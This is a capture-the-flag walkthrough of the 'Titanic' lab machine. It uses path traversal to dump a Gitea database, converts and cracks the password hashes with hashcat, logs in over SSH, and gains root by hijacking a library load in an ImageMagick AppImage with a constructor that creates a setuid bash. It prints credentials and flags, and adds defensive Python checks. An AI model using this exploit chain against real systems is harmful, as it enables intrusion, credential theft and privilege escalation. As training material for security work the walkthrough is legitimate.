Titanic

Recon

nmap_scan.log

HTTP (80)

The only thing that works on the website is Book Now.


LFI


We are probably running as the user developer, since we can read that user's home files.


The server is Apache and the application lives in /var/www/html.


Scratch that...


Same config is inside /etc/apache2/sites-available/titanic.conf

Requesting ../app.py retrieves the app source code.

/etc/hosts lists another subdomain.
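The page does not show the download handler in app.py, so as an added example (not the box's own code) here is the check such a handler needs: resolve the ticket name against a fixed directory and refuse anything that escapes it. The directory name, the function and the sample ticket names are assumptions.

```python
import os

# Assumed layout: ticket JSON files live under this directory and the
# ?ticket= query parameter names one of them.
TICKETS_DIR = "/opt/app/tickets"


def resolve_ticket_path(ticket, base_dir=TICKETS_DIR):
    """Return the absolute path of a ticket file, or None if the request
    would escape base_dir via an absolute path, ../ or a symlink."""
    if not ticket or "\x00" in ticket:
        return None
    base = os.path.realpath(base_dir)
    # os.path.join drops `base` when `ticket` is absolute, so a request for
    # /home/developer/gitea/data/gitea/gitea.db resolves outside base and
    # fails the commonpath check below, as does ../app.py.
    candidate = os.path.realpath(os.path.join(base, ticket))
    if candidate == base or os.path.commonpath([base, candidate]) != base:
        return None
    return candidate
```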


Dev Subdomain


http://dev.titanic.htb/developer/flask-app/commit/f747049bc949526d9cd9bd45cfaeed6f6db92496
http://dev.titanic.htb/developer/flask-app/commit/699639b37d9542cc26c3707a9dd9194f1cba4696

{"name": "Jack Dawson", "email": "jack.dawson@titanic.htb", "phone": "555-123-4567", "date": "2024-08-23", "cabin": "Standard"}
{"name": "Rose DeWitt Bukater", "email": "rose.bukater@titanic.htb", "phone": "643-999-021", "date": "2024-08-22", "cabin": "Suite"}

MySQL root password: MySQLP@$$w0rd!


The Gitea database can be dumped.

└─$ curl http://titanic.htb/download?ticket=/home/developer/gitea/data/gitea/gitea.db -so gitea.db
└─$ sqlitebrowser gitea.db

Convert the user rows to hashcat format

└─$ sqlite3 gitea.db "SELECT REPLACE(name || ':' || 'sha256:50000:' || BASE64(UNHEX(salt)) || ':' || BASE64(UNHEX(passwd)),CHAR(10),'') FROM user"
administrator:sha256:50000:LRSeX70bIM8x2z48aij8mw==:y6IMz5J9OtBWe2gWFzLT+8oJjOiGu8kjtAYqOWDUWcCNLfwGOyQGrJIHyYDEfF0BcTY=
developer:sha256:50000:i/PjRSt4VE+L7pQA1pNtNA==:5THTmJRhN7rqcO1qaApUOF7P8TEwnAvY8iXyhEBrfLyO/F2+8wvxaCYZJjRE6llM+1Y=
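What the sqlite query above actually produces, as an added example (not from the page): Gitea's default pbkdf2 scheme is PBKDF2-HMAC-SHA256 with 50000 iterations and a 50-byte digest, stored as hex salt and passwd columns, and hashcat mode 10900 wants the same values base64-encoded. The demo row, its salt and its password are constructed; the developer line is the one from the page.

```python
import base64
import hashlib
import hmac

ITERATIONS = 50000   # Gitea pbkdf2 default
KEY_LEN = 50         # bytes of digest Gitea stores

# Line taken from the page, used only to show parsing and a negative check.
DEVELOPER_LINE = ("developer:sha256:50000:i/PjRSt4VE+L7pQA1pNtNA==:"
                  "5THTmJRhN7rqcO1qaApUOF7P8TEwnAvY8iXyhEBrfLyO/F2+8wvxaCYZJjRE6llM+1Y=")


def gitea_passwd_hex(password, salt_hex):
    """Compute the hex `passwd` column Gitea would store for a password."""
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex),
                                 ITERATIONS, KEY_LEN)
    return digest.hex()


def db_row_to_hashcat(name, salt_hex, passwd_hex):
    """Same transformation as the page's BASE64(UNHEX(...)) sqlite query."""
    salt_b64 = base64.b64encode(bytes.fromhex(salt_hex)).decode()
    digest_b64 = base64.b64encode(bytes.fromhex(passwd_hex)).decode()
    return f"{name}:sha256:{ITERATIONS}:{salt_b64}:{digest_b64}"


def verify_hashcat_line(line, password):
    """Check one candidate password against a name:sha256:iter:salt:digest line."""
    _name, algo, iters, salt_b64, digest_b64 = line.split(":")
    if algo != "sha256":
        raise ValueError("unsupported algorithm " + algo)
    salt = base64.b64decode(salt_b64)
    expected = base64.b64decode(digest_b64)
    actual = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, int(iters), len(expected))
    return hmac.compare_digest(actual, expected)


# Constructed demo row: fixed salt, digest derived from a known password.
DEMO_SALT_HEX = "00112233445566778899aabbccddeeff"
DEMO_PASSWORD = "correct-horse-battery"
DEMO_LINE = db_row_to_hashcat("demo", DEMO_SALT_HEX,
                              gitea_passwd_hex(DEMO_PASSWORD, DEMO_SALT_HEX))
```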

Crack the developer password

➜ .\hashcat.exe -a 0 -m 10900 --user .\hashes.txt .\rockyou.txt
sha256:50000:i/PjRSt4VE+L7pQA1pNtNA==:5THTmJRhN7rqcO1qaApUOF7P8TEwnAvY8iXyhEBrfLyO/F2+8wvxaCYZJjRE6llM+1Y=:25282528

SSH (22)

└─$ sshpass -p '25282528' ssh developer@titanic.htb
developer@titanic:~$ id
uid=1000(developer) gid=1000(developer) groups=1000(developer)

User.txt

developer@titanic:~$ cat user.txt
33f47ac790d0e519063f99a3184c4c3c

Privilege Escalation

No sudo privileges

developer@titanic:~$ sudo -l
Sorry, user developer may not run sudo on titanic.

Let this run to catch any cron jobs

└─$ sshpass -p '25282528' scp /opt/scripts/enum/pspy64 developer@titanic.htb:/tmp/pspy
└─$ sshpass -p '25282528' ssh developer@titanic.htb 'chmod +x /tmp/pspy'
└─$ sshpass -p '25282528' ssh developer@titanic.htb '/tmp/pspy'

We can't SSH into the Docker container without a private key, and 37409 is an unknown service.

developer@titanic:~$ ss -tunlp4
Netid State  Recv-Q Send-Q   Local Address:Port    Peer Address:Port Process
udp   UNCONN 0      0        127.0.0.53%lo:53           0.0.0.0:*
udp   UNCONN 0      0              0.0.0.0:68           0.0.0.0:*
tcp   LISTEN 0      4096     127.0.0.53%lo:53           0.0.0.0:*
tcp   LISTEN 0      128          127.0.0.1:5000         0.0.0.0:*     users:(("python3",pid=1141,fd=3))
tcp   LISTEN 0      4096         127.0.0.1:3000         0.0.0.0:*
tcp   LISTEN 0      4096         127.0.0.1:37409        0.0.0.0:*
tcp   LISTEN 0      4096         127.0.0.1:2222         0.0.0.0:*
tcp   LISTEN 0      128            0.0.0.0:22           0.0.0.0:*
developer@titanic:~$ curl 0:37409/;echo
404: Page Not Found

There's a script in /opt/scripts used to extract image metadata.

developer@titanic:/opt/scripts$ ls -lAh
total 4.0K
-rwxr-xr-x 1 root root 167 Feb  3 17:11 identify_images.sh
developer@titanic:/opt/scripts$ cat identify_images.sh
cd /opt/app/static/assets/images
truncate -s 0 metadata.log
find /opt/app/static/assets/images/ -type f -name "*.jpg" | xargs /usr/bin/magick identify >> metadata.log

Yep, it's a cron job: metadata.log is rewritten every minute.

developer@titanic:/opt/app/static/assets/images$ ls -alh metadata.log
-rw-r----- 1 root developer 442 Feb 15 20:22 metadata.log
developer@titanic:/opt/app/static/assets/images$ ls -alh metadata.log
-rw-r----- 1 root developer 546 Feb 15 20:23 metadata.log
developer@titanic:/opt/app/static/assets/images$ magick --version
Version: ImageMagick 7.1.1-35 Q16-HDRI x86_64 1bfce2a62:20240713 https://imagemagick.org
Copyright: (C) 1999 ImageMagick Studio LLC
License: https://imagemagick.org/script/license.php
Features: Cipher DPC HDRI OpenMP(4.5)
Delegates (built-in): bzlib djvu fontconfig freetype heic jbig jng jp2 jpeg lcms lqr lzma openexr png raqm tiff webp x xml zlib
Compiler: gcc (9.4)

Arbitrary Code Execution in the AppImage version of ImageMagick

The LD_LIBRARY_PATH and MAGICK_CONFIGURE_PATH environment variables are not set, so the AppImage falls back to the current directory, which we can hijack.

developer@titanic:/opt/app/static/assets/images$ printenv | grep -E 'LD_LIBRARY_PATH|MAGICK_CONFIGURE_PATH'
gcc -x c -shared -fPIC -o ./libxcb.so.1 - << EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor)) void init(){ system("install -m4777 /bin/bash /tmp/rootbash"); exit(0); }
EOF
developer@titanic:/opt/app/static/assets/images$ ls -l /tmp/rootbash
ls: cannot access '/tmp/rootbash': No such file or directory
developer@titanic:/opt/app/static/assets/images$ ls -l /tmp/rootbash
-rwsrwxrwx 1 root root 1396520 Feb 15 20:34 /tmp/rootbash
developer@titanic:/opt/app/static/assets/images$ /tmp/rootbash -p
rootbash-5.1# id
uid=1000(developer) gid=1000(developer) euid=0(root) groups=1000(developer)
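The root cause is a root cron job changing into a directory that the developer group can write to and then running an ImageMagick AppImage that loads libraries and config from the current directory. As an added example (not from the page or the box), this audit flags exactly those conditions on a cron job's working directory; the fixture builder and its file names are constructed.

```python
import os
import stat
import tempfile


def audit_workdir(path, trusted_uid=None):
    """Return findings that make `path` unsafe as the cwd of a privileged job
    running the ImageMagick AppImage with LD_LIBRARY_PATH and
    MAGICK_CONFIGURE_PATH unset: ownership by an untrusted user, group- or
    world-writable permissions, or files the AppImage would load from cwd
    (shared objects such as libxcb.so.1, XML configuration)."""
    if trusted_uid is None:
        trusted_uid = os.getuid()   # the real cron job would pass 0 (root)
    findings = []
    st = os.stat(path)
    if st.st_uid != trusted_uid:
        findings.append(f"{path}: owned by uid {st.st_uid}, expected {trusted_uid}")
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(f"{path}: group- or world-writable")
    for name in sorted(os.listdir(path)):
        parts = name.split(".")
        # matches libfoo.so, libxcb.so.1, delegates.xml, policy.xml ...
        if "so" in parts[1:] or name.endswith(".xml"):
            findings.append(f"{os.path.join(path, name)}: loadable file in cwd")
    return findings


def build_demo_dir(planted):
    """Constructed fixture: a temporary images directory, either clean
    (0755, one jpg) or mirroring the page's state (group-writable with a
    planted libxcb.so.1 next to the images)."""
    d = tempfile.mkdtemp()
    open(os.path.join(d, "photo.jpg"), "w").close()
    if planted:
        open(os.path.join(d, "libxcb.so.1"), "w").close()
        os.chmod(d, 0o775)
    else:
        os.chmod(d, 0o755)
    return d
```

Beyond the audit, the fix for the script itself is to export both variables explicitly and to stop changing into a directory that unprivileged users can write to.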

Root.txt

rootbash-5.1# cat /root/root.txt
fda3ebb9df0d6d6a09c689d76dc24d7b
